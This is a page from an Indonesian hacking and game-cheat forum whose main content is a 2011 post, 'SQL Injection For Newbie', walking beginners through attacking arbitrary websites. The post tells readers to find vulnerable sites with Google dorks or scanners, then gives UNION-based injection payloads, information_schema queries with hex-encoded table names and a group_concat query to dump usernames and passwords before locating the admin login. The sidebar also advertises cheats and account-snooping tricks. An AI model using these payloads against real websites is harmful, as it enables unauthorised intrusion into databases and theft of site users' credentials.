S©™ Welcome And Zone ™Snuter Stars Comunity™ Forum ™S©
<strong>.::Welcome to Snuter Stars Comunity FORUM::.
-Disni tempatnya sharing berbagai macam hal-

Kalo Mau DOWNLOAD atau MELIHAT GAMBAR
Harus Menjadi MEMBER Terlebih Dahulu.

Bila Post Anda 0-1 Akan Terkena Banned,Dikarenakan Cuma Ingin Melihat Info-Info Di Forum Ini Saja.Sehabis Itu Pasti Anda Langsung Pergi Kalo Sudah Dapat Infonya. Banned Ini Akan Berlaku Pada Hari Senin-Selasa & Sabtu Minggu Akan Di Cek Setiap Hari Itu Saja.Terimakasih Selamat Bergabung!!!

[Regards Team Snuter Stars Comunity]
Signature


Administrator

&
Moderator




S© ™ † ™ Welcome And Zone Snuter Stars Comunity ™ †™ S©
 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin
Cara Menggunakan ''CHATBOX'' Login Terlebih Dahulu Pastinya,Kemudian Liat ''CHATBOX'' Di Bawah Dan Klick Login Pada Sudut Kanan ''CHATBOX'',Dan Happy Chating Anda Bisa Chatingan/Bertanya-Tanya.Anda Juga Bisa Menambahkan "SIGNATURE" (Tanda Tangan) Dengan Mengklick Profil,"SIGNATURE" Pada Pilihan Bar Di Atas Dan Isi Kan "SIGNATURE" Anda ! Dan Kalo Bisa Semua Member Yg Udah Daftar,Yg Belum Ada Avatar (Photo Profil),Silahkan Menguploadnya Agar Lebih Enak Di Lihat , Tolong Baca Ini Penting Kalo Mau Ngetopic BBcode Kadang-Kadang kekunci kadang-kadang juga nggak nah kalian pencet BBcode yg tandanya kayak begini {a/A} Terus Abis Itu Kalian Pencet Tanda {A-} itu tanda BB codenya{Bulletin Board Code} tolong Di aktifkan Kalo Mau Ngetopic & Thanks Atas Perhatiannya !
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar
Top posters
Admin*Hacker
 
Cheater*Sadam
 
Syaithon
 
|point|blank-
 
kubikiri007
 
Cheater-sejati
 
PB_LIKES
 
™E991™
 
semel1
 
rayzi
 
Latest topics
Navigation
 Portal
 Indeks
 Anggota
 Profil
 FAQ
 Pencarian
Similar topics
User Yang Sedang Online
Total 1 user online :: 0 Terdaftar, 0 Tersembunyi dan 1 Tamu

Tidak ada

User online terbanyak adalah 60 pada Sun Jul 22, 2012 8:20 pm
Most active topics
Share Cheat Lost Saga dari forum Gemscool
WH+HeadShot 16 07 2011
Cheat Ayodance PF ON OFF AutoKey
Point Black V.4 + Rpe
Share 1hit al wepon + wh + ws + ammo
Wall Hack Special New Relase (2) WallHack+WallShot+2Hit saja Work 100%
Cheat Grand Chase (SD Hack)
#Cheat Paket PRO v6066 FREE BY Mars Celebrity
™Cara Membuat Game Sendiri™
Request Cheat
Most Viewed Topics
™Cara Membuat Game Sendiri™
Cheat Ayodance PF ON OFF AutoKey
CARA MELIHAT EMAIL AKUN FACEBOOK YANG DISEMBUNYIKAN
G-cash Generator V.6.0
Share Cheat Lost Saga dari forum Gemscool
Cara-Cara Mendapatkan Senjata Kapsul di Crossfire Indonesia
Top 12 Artis Indonesia Dengan Bayaran Termahal
CHEAT PEMBACA KARTU LAWAN TEXAS HOLDEM POKER FACEBOOK
Tips N Trick Resident Evil 5 [PS3]
Cheat NINJA SAGA 1 HIT KILL + 1 JT TOKEN....HEBOH!!!
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Most active topic starters
Admin*Hacker
 
Cheater*Sadam
 
|point|blank-
 
kubikiri007
 
Cheater-sejati
 
PB_LIKES
 
™E991™
 
™Full_CHEAT™
 
L115A1
 
hacking12
 
Top posting users this week

Share | 
 

 [tutorial] SQL Injection For Newbie

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Admin*Hacker
=Chibi*Dark*Master*Angelz=
=Chibi*Dark*Master*Angelz=


Zodiac : Taurus Rooster
Jumlah posting : 912
Points : 12829
Reputation : 17
Birthday : 30.04.93
Join date : 28.05.11
Age : 23
Lokasi : jakarta
Job/hobbies : baket
Humor : bola

PostSubyek: [tutorial] SQL Injection For Newbie   Sat Jul 23, 2011 10:12 am

kita harus berbagi tutorial
agar hacker indonesia bsa menang ini
tutro yang gw tau dari wild strato

Tutorial Text ?? click next

1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner di
[You must be registered and logged in to see this link.] ama [You must be registered and logged in to see this link.]

. pilih aja dork listnya:
untuk list dork di wild-hack.blogspot.com

3. untuk yang pakai manual cek di google/bing:

contoh: [You must be registered and logged in to see this link.]
<- You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ''' at line 1
Nb: berarti Webnya bisa di hack. Dan untuk yang pakai scanner. udah disediain web yang bisa dihack


4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error

example:
[You must be registered and logged in to see this link.] order by 1-- <-- no error
[You must be registered and logged in to see this link.] order by 2-- <-- no error
[You must be registered and logged in to see this link.] order by 3-- <-- no error
[You must be registered and logged in to see this link.] order by 4-- <-- ERROR..!

5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
[You must be registered and logged in to see this link.] union all select 1,2,3--

(pada bagian warna merah (samping id) dikasih - dan pada setelah angka
id, dikasih union all select 1,2,3-- <<-- dimana pada order by
tidak terjadi error)

6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:

[You must be registered and logged in to see this link.] union all select 1,@@version,3--

7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!

8. nah coba @@version diganti jadi group_concat(table_name) dan
disamping union all select 1,2,3 ditambahkan from
information_schema.tables where table_schema=database()

Contoh: [You must be registered and logged in to see this link.] union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

9. nah disitu keluar beberapa table yang mungkin ada table berisi users
ataupun admin. contoh keluar table bernama users, lalu hex kata "users"

1. buka link: [You must be registered and logged in to see this link.]
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex: jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()

diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273

Contoh: [You must be registered and logged in to see this link.] union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--

10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password.

contoh:
group_concat(username,0x3a,password) <- setiap ingin menambahkan
column, tambahkan koma (,) dan 0x3a lalu ubah:
information_schema.columns where table_name=0x7573657273-- dengan nama
table yang barusan di hex (contoh yang ini users) maka from users--

example :
[You must be registered and logged in to see this link.] union all select 1,group_concat(username,0x3a,password)3 from users--

11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin

12. silahkan cari sendiri halaman login admin..
13 Enjoy~~

kalo ada yang punya berbagi karna
dari berbagi dapat sukses
Kembali Ke Atas Go down
Lihat profil user http://snuterstars.n-stars.org
 
[tutorial] SQL Injection For Newbie
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» wta newbie.. knalpot harga 3jt an yg enak..
» WATER INJECTION (WAI) FOR N250R
» WTS:ALL NEW KAWASAKI NINJA 250 INJECTION (SURABAYA )
» Tutorial Gear Design ?
» Knalpot R9 Ninja 250 Injection 2013

Permissions in this forum:Anda tidak dapat menjawab topik
S©™ Welcome And Zone ™Snuter Stars Comunity™ Forum ™S© :: Hacking and Cracking-
Navigasi: